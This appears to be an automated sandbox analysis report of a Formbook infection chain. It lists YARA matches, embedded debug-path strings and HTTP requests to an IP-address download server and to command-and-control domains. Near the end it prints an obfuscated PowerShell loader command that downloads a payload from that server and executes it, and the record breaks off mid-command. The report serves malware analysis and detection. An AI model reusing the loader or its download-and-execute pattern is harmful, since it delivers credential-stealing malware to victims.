Source: Yara match |
File source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY |
Source: |
Binary string: ws\System.Core.pdbAP source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: recover.pdb source: wab.exe, 0000000A.00000003.2572034726.0000000004355000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358338282.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2451195111.0000000007138000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2451195111.0000000007138000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3357478857.000000000019E000.00000002.00000001.01000000.00000007.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000002.3357480390.000000000019E000.00000002.00000001.01000000.00000007.sdmp |
Source: |
Binary string: wntdll.pdbUGP source: wab.exe, 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2494599943.000000001FBC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2489818539.000000001FA12000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2618102098.00000000030D7000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2620352047.000000000328B000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbR*\ source: powershell.exe, 00000005.00000002.2455567320.00000000081B0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2494599943.000000001FBC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2489818539.000000001FA12000.00000004.00000020.00020000.00000000.sdmp, recover.exe, recover.exe, 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2618102098.00000000030D7000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000003.2620352047.000000000328B000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: recover.pdbGCTL source: wab.exe, 0000000A.00000003.2572034726.0000000004355000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358338282.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: tem.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: stem.Core.pdb/ source: powershell.exe, 00000005.00000002.2455355993.0000000008130000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2448417031.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: wab.pdbGCTL source: recover.exe, 0000000D.00000002.3359350898.0000000003A6C000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 0000000D.00000002.3357718213.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2712305757.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3263016249.000000000414C000.00000004.80000000.00040000.00000000.sdmp |
Source: |
Binary string: wab.pdb source: recover.exe, 0000000D.00000002.3359350898.0000000003A6C000.00000004.10000000.00040000.00000000.sdmp, recover.exe, 0000000D.00000002.3357718213.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2712305757.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3263016249.000000000414C000.00000004.80000000.00040000.00000000.sdmp |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: global traffic |
HTTP traffic detected: GET /domkapitler.msi HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: 87.121.105.163
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /AKaUDBTG140.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: 87.121.105.163
Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /u88q/?JD1x=0DlVC3m4vCGug6wncaqgqqKuUkbruzRi5xsZgUPaehSOVc6HINCFVipLrdYPq7UBmIpUshg5A/LYsFxm8UV8ciKc00JDsPiUlRlugrDDUxRXgLr+6eL3wDjIGZtNF60DxKaUwkA=&oh2=URUTbBfX HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.jackcliu.com
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 |
Source: global traffic |
HTTP traffic detected: GET /u88q/?oh2=URUTbBfX&JD1x=Fnw+Kkvo9UiFBUB0BzGganbpu8YN0fNkhYYqzUajtTvKESvtEwiZd1IH4bIIdv0EIySOXqNUieqhNf+/Ii9vQJQYiwRJrNl2lD6A4M73rg6+TGfrZqaku0vmqC+Mi6plDuyAi3g= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.smartfindsdepot.shop
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 |
Source: powershell.exe, 00000002.00000002.2516302962.000002431CFA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2516302962.000002431EC0E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163 |
Source: wab.exe, 0000000A.00000002.2619504780.0000000004332000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163// |
Source: wab.exe, 0000000A.00000002.2632499102.000000001F2F0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/AKaUDBTG140.bin |
Source: wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/AKaUDBTG140.bin/ |
Source: wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/AKaUDBTG140.binb |
Source: wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/AKaUDBTG140.bin~OU |
Source: powershell.exe, 00000002.00000002.2516302962.000002431CFA4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/domkapitler.msiP |
Source: powershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/domkapitler.msiXR |
Source: powershell.exe, 00000002.00000002.2516302962.000002431EDC4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.H |
Source: powershell.exe, 00000005.00000002.2451195111.00000000070E0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microv |
Source: powershell.exe, 00000002.00000002.2640024983.000002432CDEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.2516302962.000002431CD81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2448700905.0000000004681000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: qdSMStVpAfAXHdDEbm.exe, 0000000E.00000002.3358444045.000000000111C000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.smartfindsdepot.shop |
Source: qdSMStVpAfAXHdDEbm.exe, 0000000E.00000002.3358444045.000000000111C000.00000040.80000000.00040000.00000000.sdmp |
String found in binary or memory: http://www.smartfindsdepot.shop/u88q/ |
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ac.ecosia.org/autocomplete?q= |
Source: powershell.exe, 00000002.00000002.2516302962.000002431CD81000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000005.00000002.2448700905.0000000004681000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search |
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: powershell.exe, 00000005.00000002.2448700905.00000000047D5000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.2516302962.000002431E15B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com: |
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com:: |
Source: recover.exe, 0000000D.00000003.3123298265.0000000007BC0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login. |
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033 |
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM |
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033S |
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live |
Source: recover.exe, 0000000D.00000002.3357718213.0000000002E84000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live. |
Source: powershell.exe, 00000002.00000002.2640024983.000002432CDEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2449498441.00000000056E4000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.ecosia.org/newtab/ |
Source: recover.exe, 0000000D.00000003.3126194443.0000000007C55000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: Yara match |
File source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY |
Source: amsi64_7108.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: amsi32_1364.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown |
Source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 1364, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . 
DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a |